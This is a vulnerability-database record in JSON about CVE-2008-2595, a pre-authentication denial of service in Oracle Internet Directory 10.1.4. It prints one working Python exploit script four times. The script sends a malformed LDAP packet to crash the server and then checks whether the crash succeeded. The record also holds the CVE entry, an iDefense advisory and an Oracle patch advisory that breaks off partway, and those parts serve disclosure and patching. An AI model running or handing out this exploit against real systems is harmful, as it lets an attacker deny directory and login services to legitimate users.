{"lastseen": "2020-04-01T19:04:39", "references": [], "description": "\nOracle Internet Directory 10.1.4 - Remote Denial of Service", "edition": 2, "reporter": "Joxean Koret", "exploitpack": {"type": "dos", "platform": "multiple"}, "published": "2008-07-19T00:00:00", "title": "Oracle Internet Directory 10.1.4 - Remote Denial of Service", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-1343"]}, {"type": "cve", "idList": ["CVE-2008-2595"]}, {"type": "exploitdb", "idList": ["EDB-ID:6101"]}, {"type": "nessus", "idList": ["ORACLE_APPLICATION_SERVER_PCI.NASL"]}, {"type": "oracle", "idList": ["ORACLE:CPUJUL2008-090335"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:68369"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:20166", "SECURITYVULNS:DOC:20167", "SECURITYVULNS:VULN:9153"]}, {"type": "seebug", "idList": ["SSV:65604", "SSV:9306"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2014-1343"]}, {"type": "cve", "idList": ["CVE-2008-2595"]}, {"type": "exploitdb", "idList": ["EDB-ID:6101"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9153"]}, {"type": "seebug", "idList": ["SSV:9306"]}]}, "exploitation": null, "vulnersScore": 5.2}, "bulletinFamily": "exploit", "cvelist": ["CVE-2008-2595"], "modified": "2008-07-19T00:00:00", "id": "EXPLOITPACK:B095EADDF6B9035B988763688D9BAF1E", "href": "", "viewCount": 3, "sourceData": "#!/usr/bin/python\n\n\"\"\"\nOracle Internet Directory 10.1.4 preauthentication Denial Of Service\n\nNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.\nSometimes you need 2 shoots to crash OID completely. 
The server \"commonly\" tolerates one\nshoot, but even when you only send one packet it will crash.\n\nTested: Win2000 x86, WinXP x86, Win2003 X86_64\n\nVulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)\n\nFixed: Oracle Critical Patch Update July 2008\nCVEID: CVE-2008-2595\n\"\"\"\n\nimport sys\nimport time\nimport socket\n\nhealthPacket = \"0%\\\\x02\\\\x01\\\\x01c \\\\x04\\\\x00\\\\n\\\\x01\\\\x02\\\\n\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x01\\\\x01\\\\x00\\\\x87\\\\x0bobjectClass0\\\\x00\"\npacket = \"\\x30\\x0e\\x02\\x01\\x01\\x60\\x09\\x30\\x01\\x03\\x04\\x02\\x44\\x4e\\x80\\x00\"\n\ndef checkHealth(hostname, port):\n print \" --> Wating 5 seconds\"\n time.sleep(5)\n \n print \" --> Connecting to target...\"\n socket.setdefaulttimeout(5)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((hostname, port))\n\n try:\n print \" --> Sending 'health' packet ...\"\n s.sendall(healthPacket)\n print \" --> Trying to receive something...\"\n data = s.recv(1024)\n except:\n err = sys.exc_info()[1]\n\n if int(err[0]) == 104:\n print \"[+] Exploits works!\"\n return\n\n if data != \"\":\n print \"[!] Server is up and running :(\"\n else:\n print \"[?] Server doesn't answer nothing. 
It works?\"\n\ndef oidDos(hostname, port):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n try:\n print \"[+] Connecting to ldap://%s:%d...\" % (hostname, port)\n s.connect((hostname, int(port)))\n\n print \"[+] Sending packet...\"\n s.sendall(packet)\n s.close()\n\n print \"[+] Checking OID's health...\"\n checkHealth(hostname, port)\n except:\n print sys.exc_info()[1]\n\ndef usage():\n print \"Oracle Internet Directory 10.1.4 Remote Preauthentication DOS\"\n print \"Copyright (c) 2007 Joxean Koret\"\n print\n print \"Usage:\"\n print sys.argv[0],\"-h<hostname> -p<port>\"\n print\n\ndef main():\n if len(sys.argv) != 3:\n usage()\n sys.exit(0)\n \n hostname = None\n port = None\n\n i = 0\n for param in sys.argv:\n i += 1\n \n if i == 1:\n continue\n \n if param.startswith(\"-h\"):\n hostname = param[2:]\n elif param.startswith(\"-p\"):\n port = int(param[2:])\n else:\n print \"Unknown option '%s'\" % param\n usage()\n sys.exit(1)\n \n if not hostname or not port:\n print \"Bad command line.\"\n usage()\n sys.exit(1)\n\n oidDos(hostname, port)\n\nif __name__ == \"__main__\":\n main()\n\n# milw0rm.com [2008-07-19]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5.0, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {}, "scheme": null, "_state": {"dependencies": 1647589307, "score": 0}}
{"seebug": [{"lastseen": "2017-11-19T21:31:29", "description": "No description provided by source.", "cvss3": {}, "published": "2008-08-17T00:00:00", "title": "Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-2595"], "modified": "2008-08-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-9306", "id": "SSV:9306", "sourceData": "\n #!/usr/bin/python\r\n\r\n"""\r\nOracle Internet Directory 10.1.4 preauthentication Denial Of Service\r\n\r\nNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.\r\nSometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one\r\nshoot, but even when you only send one packet it will crash.\r\n\r\nTested: Win2000 x86, WinXP x86, Win2003 X86_64\r\n\r\nVulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)\r\n\r\nFixed: Oracle Critical Patch Update July 2008\r\nCVEID: CVE-2008-2595\r\n"""\r\n\r\nimport sys\r\nimport time\r\nimport socket\r\n\r\nhealthPacket = "0%\\\\x02\\\\x01\\\\x01c \\\\x04\\\\x00\\\\n\\\\x01\\\\x02\\\\n\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x01\\\\x01\\\\x00\\\\x87\\\\x0bobjectClass0\\\\x00"\r\npacket = "\\x30\\x0e\\x02\\x01\\x01\\x60\\x09\\x30\\x01\\x03\\x04\\x02\\x44\\x4e\\x80\\x00"\r\n\r\ndef checkHealth(hostname, port):\r\n print " --> Wating 5 seconds"\r\n time.sleep(5)\r\n \r\n print " --> Connecting to target..."\r\n socket.setdefaulttimeout(5)\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((hostname, port))\r\n\r\n try:\r\n print " --> Sending 'health' packet ..."\r\n s.sendall(healthPacket)\r\n print " --> Trying to receive something..."\r\n data = s.recv(1024)\r\n except:\r\n err = sys.exc_info()[1]\r\n\r\n if int(err[0]) == 104:\r\n print "[+] Exploits works!"\r\n return\r\n\r\n if data != "":\r\n print "[!] Server is up and running :("\r\n else:\r\n print "[?] 
Server doesn't answer nothing. It works?"\r\n\r\ndef oidDos(hostname, port):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n print "[+] Connecting to ldap://%s:%d..." % (hostname, port)\r\n s.connect((hostname, int(port)))\r\n\r\n print "[+] Sending packet..."\r\n s.sendall(packet)\r\n s.close()\r\n\r\n print "[+] Checking OID's health..."\r\n checkHealth(hostname, port)\r\n except:\r\n print sys.exc_info()[1]\r\n\r\ndef usage():\r\n print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"\r\n print "Copyright (c) 2007 Joxean Koret"\r\n print\r\n print "Usage:"\r\n print sys.argv[0],"-h<hostname> -p<port>"\r\n print\r\n\r\ndef main():\r\n if len(sys.argv) != 3:\r\n usage()\r\n sys.exit(0)\r\n \r\n hostname = None\r\n port = None\r\n\r\n i = 0\r\n for param in sys.argv:\r\n i += 1\r\n \r\n if i == 1:\r\n continue\r\n \r\n if param.startswith("-h"):\r\n hostname = param[2:]\r\n elif param.startswith("-p"):\r\n port = int(param[2:])\r\n else:\r\n print "Unknown option '%s'" % param\r\n usage()\r\n sys.exit(1)\r\n \r\n if not hostname or not port:\r\n print "Bad command line."\r\n usage()\r\n sys.exit(1)\r\n\r\n oidDos(hostname, port)\r\n\r\nif __name__ == "__main__":\r\n main()\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-9306", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-11-19T14:48:37", "description": "No description provided by source.", "cvss3": {}, "published": "2014-07-01T00:00:00", "title": "Oracle Internet Directory 10.1.4 - Remote Preauth DoS Exploit", "type": "seebug", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-2595"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-65604", "id": "SSV:65604", "sourceData": "\n #!/usr/bin/python\r\n\r\n"""\r\nOracle Internet Directory 10.1.4 preauthentication Denial Of Service\r\n\r\nNOTES: Under 32 bits platforms it crashes immediately. 
Under 64 bits it may take even hours.\r\nSometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one\r\nshoot, but even when you only send one packet it will crash.\r\n\r\nTested: Win2000 x86, WinXP x86, Win2003 X86_64\r\n\r\nVulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es)\r\n\r\nFixed: Oracle Critical Patch Update July 2008\r\nCVEID: CVE-2008-2595\r\n"""\r\n\r\nimport sys\r\nimport time\r\nimport socket\r\n\r\nhealthPacket = "0%\\\\x02\\\\x01\\\\x01c \\\\x04\\\\x00\\\\n\\\\x01\\\\x02\\\\n\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x01\\\\x01\\\\x00\\\\x87\\\\x0bobjectClass0\\\\x00"\r\npacket = "\\x30\\x0e\\x02\\x01\\x01\\x60\\x09\\x30\\x01\\x03\\x04\\x02\\x44\\x4e\\x80\\x00"\r\n\r\ndef checkHealth(hostname, port):\r\n print " --> Wating 5 seconds"\r\n time.sleep(5)\r\n \r\n print " --> Connecting to target..."\r\n socket.setdefaulttimeout(5)\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.connect((hostname, port))\r\n\r\n try:\r\n print " --> Sending 'health' packet ..."\r\n s.sendall(healthPacket)\r\n print " --> Trying to receive something..."\r\n data = s.recv(1024)\r\n except:\r\n err = sys.exc_info()[1]\r\n\r\n if int(err[0]) == 104:\r\n print "[+] Exploits works!"\r\n return\r\n\r\n if data != "":\r\n print "[!] Server is up and running :("\r\n else:\r\n print "[?] Server doesn't answer nothing. It works?"\r\n\r\ndef oidDos(hostname, port):\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n try:\r\n print "[+] Connecting to ldap://%s:%d..." 
% (hostname, port)\r\n s.connect((hostname, int(port)))\r\n\r\n print "[+] Sending packet..."\r\n s.sendall(packet)\r\n s.close()\r\n\r\n print "[+] Checking OID's health..."\r\n checkHealth(hostname, port)\r\n except:\r\n print sys.exc_info()[1]\r\n\r\ndef usage():\r\n print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"\r\n print "Copyright (c) 2007 Joxean Koret"\r\n print\r\n print "Usage:"\r\n print sys.argv[0],"-h<hostname> -p<port>"\r\n print\r\n\r\ndef main():\r\n if len(sys.argv) != 3:\r\n usage()\r\n sys.exit(0)\r\n \r\n hostname = None\r\n port = None\r\n\r\n i = 0\r\n for param in sys.argv:\r\n i += 1\r\n \r\n if i == 1:\r\n continue\r\n \r\n if param.startswith("-h"):\r\n hostname = param[2:]\r\n elif param.startswith("-p"):\r\n port = int(param[2:])\r\n else:\r\n print "Unknown option '%s'" % param\r\n usage()\r\n sys.exit(1)\r\n \r\n if not hostname or not port:\r\n print "Bad command line."\r\n usage()\r\n sys.exit(1)\r\n\r\n oidDos(hostname, port)\r\n\r\nif __name__ == "__main__":\r\n main()\r\n\r\n# milw0rm.com [2008-07-19]\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-65604", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:12:05", "description": "", "cvss3": {}, "published": "2008-07-21T00:00:00", "type": "packetstorm", "title": "oracleidir-dos.txt", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2008-2595"], "modified": "2008-07-21T00:00:00", "id": "PACKETSTORM:68369", "href": "https://packetstormsecurity.com/files/68369/oracleidir-dos.txt.html", "sourceData": "`#!/usr/bin/python \n \n\"\"\" \nOracle Internet Directory 10.1.4 preauthentication Denial Of Service \n \nNOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours. \nSometimes you need 2 shoots to crash OID completely. The server \"commonly\" tolerates one \nshoot, but even when you only send one packet it will crash. 
\n \nTested: Win2000 x86, WinXP x86, Win2003 X86_64 \n \nVulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es) \n \nFixed: Oracle Critical Patch Update July 2008 \nCVEID: CVE-2008-2595 \n\"\"\" \n \nimport sys \nimport time \nimport socket \n \nhealthPacket = \"0%\\\\x02\\\\x01\\\\x01c \\\\x04\\\\x00\\\\n\\\\x01\\\\x02\\\\n\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x02\\\\x01\\\\x00\\\\x01\\\\x01\\\\x00\\\\x87\\\\x0bobjectClass0\\\\x00\" \npacket = \"\\x30\\x0e\\x02\\x01\\x01\\x60\\x09\\x30\\x01\\x03\\x04\\x02\\x44\\x4e\\x80\\x00\" \n \ndef checkHealth(hostname, port): \nprint \" --> Wating 5 seconds\" \ntime.sleep(5) \n \nprint \" --> Connecting to target...\" \nsocket.setdefaulttimeout(5) \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.connect((hostname, port)) \n \ntry: \nprint \" --> Sending 'health' packet ...\" \ns.sendall(healthPacket) \nprint \" --> Trying to receive something...\" \ndata = s.recv(1024) \nexcept: \nerr = sys.exc_info()[1] \n \nif int(err[0]) == 104: \nprint \"[+] Exploits works!\" \nreturn \n \nif data != \"\": \nprint \"[!] Server is up and running :(\" \nelse: \nprint \"[?] Server doesn't answer nothing. 
It works?\" \n \ndef oidDos(hostname, port): \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ntry: \nprint \"[+] Connecting to ldap://%s:%d...\" % (hostname, port) \ns.connect((hostname, int(port))) \n \nprint \"[+] Sending packet...\" \ns.sendall(packet) \ns.close() \n \nprint \"[+] Checking OID's health...\" \ncheckHealth(hostname, port) \nexcept: \nprint sys.exc_info()[1] \n \ndef usage(): \nprint \"Oracle Internet Directory 10.1.4 Remote Preauthentication DOS\" \nprint \"Copyright (c) 2007 Joxean Koret\" \nprint \nprint \"Usage:\" \nprint sys.argv[0],\"-h<hostname> -p<port>\" \nprint \n \ndef main(): \nif len(sys.argv) != 3: \nusage() \nsys.exit(0) \n \nhostname = None \nport = None \n \ni = 0 \nfor param in sys.argv: \ni += 1 \n \nif i == 1: \ncontinue \n \nif param.startswith(\"-h\"): \nhostname = param[2:] \nelif param.startswith(\"-p\"): \nport = int(param[2:]) \nelse: \nprint \"Unknown option '%s'\" % param \nusage() \nsys.exit(1) \n \nif not hostname or not port: \nprint \"Bad command line.\" \nusage() \nsys.exit(1) \n \noidDos(hostname, port) \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/68369/oracleidir-dos.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "cve": [{"lastseen": "2022-03-23T12:17:31", "description": "Unspecified vulnerability in the Oracle Internet Directory component in Oracle Application Server 9.0.4.3, 10.1.2.3, and 10.1.4.2 has unknown impact and remote attack vectors. NOTE: the previous information was obtained from the Oracle July 2008 CPU. 
Oracle has not commented on reliable researcher claims that this issue is a denial of service (crash) via a malformed LDAP request that triggers a NULL pointer dereference.", "cvss3": {}, "published": "2008-07-15T23:41:00", "type": "cve", "title": "CVE-2008-2595", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2595"], "modified": "2017-09-29T01:31:00", "cpe": ["cpe:/a:oracle:database_10g:10.1.4.2", "cpe:/a:oracle:database_10g:10.1.2.3", "cpe:/a:oracle:database_9i:9.0.4.3"], "id": "CVE-2008-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2595", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:oracle:database_9i:9.0.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_10g:10.1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:database_10g:10.1.2.3:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:10:26", "description": "iDefense Security Advisory 07.15.08\r\nhttp://labs.idefense.com/intelligence/vulnerabilities/\r\nJul 15, 2008\r\n\r\nI. BACKGROUND\r\n\r\nInternet Directory is Oracle's implementation of the Lightweight\r\nDirectory Access Protocol (LDAP) v3 service. It is used in conjunction\r\nwith Oracle Identity Management to implement user administration in the\r\nOracle environment. More information can be found at the following URL.\r\n\r\nhttp://www.oracle.com/technology/products/oid/index.html\r\n\r\nII. 
DESCRIPTION\r\n\r\nRemote exploitation of a pre-authentication input validation\r\nvulnerability in Oracle Corp.'s Oracle Internet Directory allows an\r\nattacker to conduct a denial of service attack on a vulnerable host.\r\n\r\nInternet Directory consists of two processes. One process acts as a\r\nlistener. It handles incoming connections and passes them off to the\r\nsecond process. The second process, which handles requests, contains\r\nthe vulnerability.\r\n\r\nWhen processing a malformed LDAP request, it is possible to cause the\r\nhandler to dereference a NULL pointer. This results in the process\r\ncrashing. Future connection requests will be accepted by the listener\r\nprocess, and then immediately closed when it finds that there is no\r\nhandler process running.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability allows an attacker to deny service to\r\nlegitimate users of the directory server. In order to exploit this\r\nissue, an attacker must be able to establish an LDAP session with the\r\nvulnerable server. This is typically done via TCP port 389 or the\r\nSSL-enabled TCP port 636. No authentication is needed. In order to\r\nrestore functionality, the listener process must be stopped and\r\nrestarted.\r\n\r\nIV. DETECTION\r\n\r\niDefense confirmed the existence of this vulnerability in Oracle\r\nInternet Directory for Windows version 10.1.4.0.1 with the April 2007\r\nCPU installed. Previous versions may also be affected.\r\n\r\nV. WORKAROUND\r\n\r\niDefense is currently unaware of any workarounds for this issue.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nOracle Corp. has addressed this vulnerability with the release of their\r\nJuly 2008 Critical Patch Update. For more information, visit the\r\nfollowing URL.\r\n\r\nhttp://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CVE-2008-2595 to this issue. 
This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org/), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n05/11/2007 Initial vendor notification\r\n05/11/2007 Initial vendor response\r\n07/15/2008 Coordinated public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThis vulnerability was reported to iDefense by Joxean Koret.\r\n\r\nGet paid for vulnerability research\r\nhttp://labs.idefense.com/methodology/vulnerability/vcp.php\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.idefense.com/\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2008 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically,\r\nplease e-mail customerservice@idefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\n There are no warranties with regard to this information. 
Neither the\r\nauthor nor the publisher accepts any liability for any direct,\r\nindirect, or consequential loss or damage arising from use of, or\r\nreliance on, this information.", "edition": 1, "cvss3": {}, "published": "2008-07-18T00:00:00", "title": "iDefense Security Advisory 07.15.08: Oracle Internet Directory Pre-Authentication LDAP DoS Vulnerability", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2008-2595"], "modified": "2008-07-18T00:00:00", "id": "SECURITYVULNS:DOC:20167", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20167", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:26", "description": "Oracle Critical Patch Update Advisory - July 2008\r\nDescription\r\n\r\nA Critical Patch Update is a collection of patches for multiple security vulnerabilities. It also includes non-security fixes that are required (because of interdependencies) by those security patches. Critical Patch Updates are cumulative, except as noted below, but each advisory describes only the security fixes added since the previous Critical Patch Update. Thus, prior Critical Patch Update Advisories should be reviewed for information regarding earlier accumulated security fixes. Please refer to\r\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\r\n\r\nDue to the threat posed by a successful attack, Oracle strongly recommends that customers apply fixes as soon as possible. This Critical Patch Update contains 45 new security fixes across all products.\r\nSupported Products and Components Affected\r\n\r\nSecurity vulnerabilities addressed by this Critical Patch Update affect the products listed in the categories below. The product area of the patches for the listed versions is shown in [square brackets] following the product versions. 
Please click on the link in [square brackets] or in the Patch Availability Table to access the documentation for those patches.\r\nCategory I\r\n\r\nProduct releases and versions that are in Premier Support or Extended Support, under the Oracle Lifetime Support policy:\r\n\u2022 Oracle Database 11g, version 11.1.0.6 \t [ Database ]\r\n\u2022 Oracle Database 10g Release 2, versions 10.2.0.2, 10.2.0.3, 10.2.0.4 \t [ Database ]\r\n\u2022 Oracle Database 10g, version 10.1.0.5 \t [ Database ]\r\n\u2022 Oracle Database 9i Release 2, versions 9.2.0.8, 9.2.0.8DV \t [ Database ]\r\n\u2022 Oracle TimesTen In-Memory Database version 7.0.3.0.0 \t [ Database ]\r\n\u2022 Oracle Application Server 10g Release 3 (10.1.3), versions 10.1.3.1.0, 10.1.3.3.0 \t [ Application Server ]\r\n\u2022 Oracle Application Server 10g Release 2 (10.1.2), versions 10.1.2.2.0, 10.1.2.3.0 \t [ Application Server ]\r\n\u2022 Oracle Application Server 10g (9.0.4), version 9.0.4.3 \t [ Application Server ]\r\n\u2022 Oracle Hyperion BI Plus version 9.2.0.3, 9.2.1.0,and 9.3.1.0 \t [ Application Server ]\r\n\u2022 Oracle Hyperion Performance Suite version 8.3.2.4, and 8.5.0.3 \t [ Application Server ]\r\n\u2022 Oracle E-Business Suite Release 12, version 12.0.4 \t [ E-Business Suite ]\r\n\u2022 Oracle E-Business Suite Release 11i, version 11.5.10.2 \t [ E-Business Suite ]\r\n\u2022 Oracle Enterprise Manager Database Control 11i version 11.1.0.6 \t [ Enterprise Manager ]\r\n\u2022 Oracle Enterprise Manager Database Control 10g Release 2, versions 10.2.0.2, 10.2.0.3, 10.2.0.4 \t [ Enterprise Manager ]\r\n\u2022 Oracle Enterprise Manager Database Control 10g Release 1, version 10.1.0.5 \t [ Enterprise Manager ]\r\n\u2022 Oracle Enterprise Manager Grid Control 10g Release 1, versions 10.1.0.5, 10.1.0.6 \t [ Enterprise Manager ]\r\n\u2022 Oracle PeopleSoft Enterprise PeopleTools versions 8.48.17, 8.49.11 \t [ PeopleSoft/JDE ]\r\n\u2022 Oracle PeopleSoft Enterprise CRM version 8.9, 9.0 \t [ PeopleSoft/JDE 
]\r\n\u2022 Oracle WebLogic Server (formerly BEA WebLogic Server) 10.0 released through MP1 \t [ BEA ]\r\n\u2022 Oracle WebLogic Server (formerly BEA WebLogic Server) 9.0, 9.1, 9.2 released through MP3 \t [ BEA ]\r\n\u2022 Oracle WebLogic Server (formerly BEA WebLogic Server) 8.1 released through SP6 \t [ BEA ]\r\n\u2022 Oracle WebLogic Server (formerly BEA WebLogic Server) 7.0 released through SP7 \t [ BEA ]\r\n\u2022 Oracle WebLogic Server (formerly BEA WebLogic Server) 6.1 released through SP7 \t [ BEA ]\r\nCategory II\r\n\r\nProducts and components that are bundled with the products listed in Category I.\r\nNo products in this category are affected by the fixes included in this Critical Patch Update.\r\nCategory III\r\n\r\nProducts that are de-supported as a standalone installation but are supported when installed with the products listed in Category I:\r\n\u2022 Oracle Database 9i, version 9.0.1.5 FIPS+ \t [ Application Server ]\r\n\u2022 Oracle Application Server 9i Release 1, version 1.0.2.2 \t [ E-Business Suite ]\r\n\r\nPatches for Category III products are only available when these products are installed as part of Category I products, and are tested solely on supported configurations and environments. 
Please refer to the documentation for each product for specific details concerning the support and availability of patches.\r\n\r\nPatch Availability Table and Risk Matrices\r\n\r\nThe Oracle Database, Oracle Application Server, Oracle Enterprise Manager Grid Control, Oracle E-Business Suite Applications (Release 12 only), JD Edwards EnterpriseOne, JD Edwards OneWorld Tools, PeopleSoft Enterprise Portal Applications, PeopleSoft Enterprise PeopleTools and Siebel Enterprise patches in the Updates are cumulative; patches for any product included in a Critical Patch Update will include all fixes for that product from the previous Critical Patch Updates.\r\n\r\nOracle E-Business Suite Applications Release 11i patches are not cumulative, so Oracle E-Business Suite Applications customers should refer to previous Critical Patch Updates to identify previous security fixes they want to apply. Oracle Collaboration Suite patches were cumulative up to and including the fixes provided in the July 2007 Critical Patch Update. From the July 2007 Critical Patch Update on, Oracle Collaboration Suite security fixes are delivered using the one-off patch infrastructure normally used by Oracle to deliver single bug fixes to customers. Patches for BEA products are not cumulative (unless otherwise stated), so BEA customers should refer to previous Security Advisories to identify previous security fixes they want to apply.\r\n\r\nFor each Oracle product being administered, please consult the documentation for patch availability information and installation instructions referenced from the following table. 
For an overview of the Oracle product documentation related to this Critical Patch Update, please refer to the Oracle Critical Patch Update July 2008 Documentation Map, MetaLink Note 605152.1.\r\nProduct \tRisk Matrix \tPatch Availability and Installation Information\r\nOracle Database \tAppendix A - Oracle Database Risk Matrix \tCritical Patch Update July 2008 Availability Information for Oracle Database and Fusion Middleware Products, MetaLink Note 579278.1\r\nOracle Application Server \tAppendix B - Oracle Application Server Risk Matrix \tCritical Patch Update July 2008 Availability Information for Oracle Database and Fusion Middleware Products, MetaLink Note 579278.1\r\nOracle Collaboration Suite \tSee Critical Patch Update Advisory-Jan-2008 for last set of vulnerabilities fixed for Oracle Collaboration Suite \tCritical Patch Update Advisory-Jan-2008\r\nOracle E-Business Suite and Applications \tAppendix D - Oracle E-Business Suite and Applications Risk Matrix \tE-Business Suite Critical Patch Update Note, MetaLink Note 605117.1\r\nOracle Enterprise Manager \tAppendix E - Enterprise Manager Risk Matrix \tCritical Patch Update July 2008 Availability Information for Oracle Database and Fusion Middleware Products, MetaLink Note 579278.1\r\nOracle PeopleSoft Enterprise and JD Edwards EnterpriseOne \tAppendix F - Oracle PeopleSoft and JD Edwards Applications Risk Matrix \tOracle PeopleSoft Enterprise and JD Edwards EnterpriseOne Advisories\r\nOracle Siebel Enterprise \tSee Critical Patch Update Advisory-Apr-2008 for last set of vulnerabilities fixed for Siebel products \tCritical Patch Update Advisory-Apr-2008\r\nOracle WebLogic Server \tAppendix H - BEA Product Suite Risk Matrix \tSecurity Advisories for BEA Products\r\n\r\n\r\nRisk Matrix Content\r\n\r\nRisk matrices list only security vulnerabilities that are newly fixed by the patches associated with this advisory. 
Risk matrices for previous security fixes can be found in previous Critical Patch Update advisories.\r\n\r\nSeveral vulnerabilities addressed in this Critical Patch Update affect multiple products. The same vulnerability appears with the same Vuln # in all risk matrices. Italics indicate vulnerabilities in code included from other product areas.\r\n\r\nSecurity vulnerabilities are scored using CVSS version 2.0 (see Oracle CVSS Scoring). Oracle conducts an analysis of each security vulnerability addressed by a Critical Patch Update (CPU). Oracle does not disclose information about the security analysis, but the resulting Risk Matrix and associated documentation provide information about the type of vulnerability, the conditions required to exploit it, and the potential result of a successful exploit. Oracle provides this information, in part, so that customers may conduct their own risk analysis based on the particulars of their product usage. As a matter of policy, Oracle does not disclose detailed information about an exploit condition or results that can be used to conduct a successful exploit. Oracle will not provide additional information about the specifics of vulnerabilities beyond what is provided in the CPU or Security Alert notification, the Patch Availability Matrix, the readme files, and FAQs. Oracle does not provide advance notification on CPUs or Security Alerts to individual customers. Finally, Oracle does not distribute exploit code or \u201cproof-of-concept\u201d code for product vulnerabilities.\r\n\r\nStarting in the July, 2008 Critical Patch Update, Oracle will use Common Vulnerabilities and Exposures (CVE) identifiers rather than Oracle proprietary identifiers for identifying vulnerabilities (Vuln#) in Risk Matrices(see FAQ). 
